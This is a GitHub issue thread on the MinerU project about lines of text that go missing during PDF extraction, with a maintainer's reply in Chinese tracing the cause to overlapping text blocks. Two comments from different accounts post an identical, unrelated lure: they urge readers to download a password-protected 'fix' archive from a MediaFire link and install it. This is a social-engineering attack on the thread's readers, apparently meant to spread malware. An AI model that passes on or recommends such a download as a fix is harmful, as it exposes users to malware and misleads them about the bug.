### ISSUE TITLE
text line missing

### ISSUE THREAD

**Issue by drunkpig** [opendatalab/MinerU#492]
### Description of the bug | 错误描述

![f026269ae8f00cc3817b51d4c2264c4](https://github.com/user-attachments/assets/8de00656-a13e-4ee3-9b0e-ae97c1f634e5)

some text line is missing.

[bb.pdf](https://github.com/user-attachments/files/16755702/bb.pdf)

### How to reproduce the bug | 如何复现

use magic-pdf cli

### Operating system | 操作系统

Linux

### Python version | Python 版本

3.10

### Software version | 软件版本 (magic-pdf --version)

0.7.x

### Device mode | 设备模式

cuda

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by myhloli** [comment]
<img width="1323" alt="image" src="https://github.com/user-attachments/assets/be3749ea-8de2-40b4-aec3-494f367559ef">
模型识别到的textblock有重叠，在后续处理时，通过避让规则两个框各回缩了一部分，导致上面一条过窄，后续文本的span无法fill进缩窄的block中。
